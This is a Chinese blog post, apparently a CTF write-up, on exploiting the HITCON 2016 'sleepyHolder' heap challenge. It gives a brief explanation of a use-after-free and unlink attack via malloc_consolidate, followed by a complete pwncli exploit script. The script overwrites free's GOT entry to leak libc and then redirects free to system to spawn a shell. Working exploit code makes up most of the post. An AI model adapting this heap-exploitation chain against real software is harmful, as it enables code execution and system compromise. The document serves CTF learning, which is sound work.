Loading

sleepyHolder_hitcon_2016

sleepyHolder_hitcon_2016

总结

一个UAF洞,然后是常规的unlink。穿插着一个malloc_consolidation的理解,即如何构造unlink的条件。

利用过程

  • 申请小的chunk
  • 申请大的chunk
  • 释放掉小的chunk
  • 申请超大的chunk,此时触发malloc_consolidation,得到一个小的samll bin chunk
  • 再次释放小的chunkoverlap
  • 申请小的chunk,布局unlink
  • 释放大的chunk,触发unlink
  • 修改free@gotputs@plt泄露地址
  • 修改free@gotsystem获取shell

Exp

from pwncli import *

cli_script()

p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']

def keep(size_type:int, data:(str, bytes)):
    p.sendlineafter("3. Renew secret\n", "1")
    p.sendlineafter("2. Big secret\n", str(size_type))
    p.sendafter("Tell me your secret: \n", data)


def swip(size_type:int):
    p.sendlineafter("3. Renew secret\n", "2")
    p.sendlineafter("2. Big secret\n", str(size_type))


def renew(size_type:int, data:(str, bytes)):
    p.sendlineafter("3. Renew secret\n", "3")
    p.sendlineafter("2. Big secret\n", str(size_type))
    p.sendafter("Tell me your secret: \n", data)


def get_small(data="deadbeef\n"): keep(1, data)

def get_big(data="deadbeef\n"): keep(2, data)

def get_huge(data="deadbeef\n"): keep(3, data)

def free_small(): swip(1)

def free_big(): swip(2)

def write_small(data): renew(1, data)

def write_big(data): renew(2, data)


get_small()
get_big()

free_small()
get_huge()

free_small()

layout = [0, 0x21, 
        0x6020d0-0x18, 0x6020d0 - 0x10, 0x20]

get_small(flat(layout))

free_big()

write_small(flat(0, elf.got['puts'], 0, elf.got['free'], (1 << 32) + 1))
write_small(p64(elf.plt['puts']))

free_big()

libc_base_addr = u64(p.recvn(6) + b"\x00\x00") - libc.sym['puts']
log_address("libc_base_addr", libc_base_addr)

write_small(p64(libc.sym['system'] + libc_base_addr))

get_big("/bin/sh\x00")

free_big()

p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

posted @ 2021-09-05 16:21  LynneHuan  阅读(104)  评论(0编辑  收藏  举报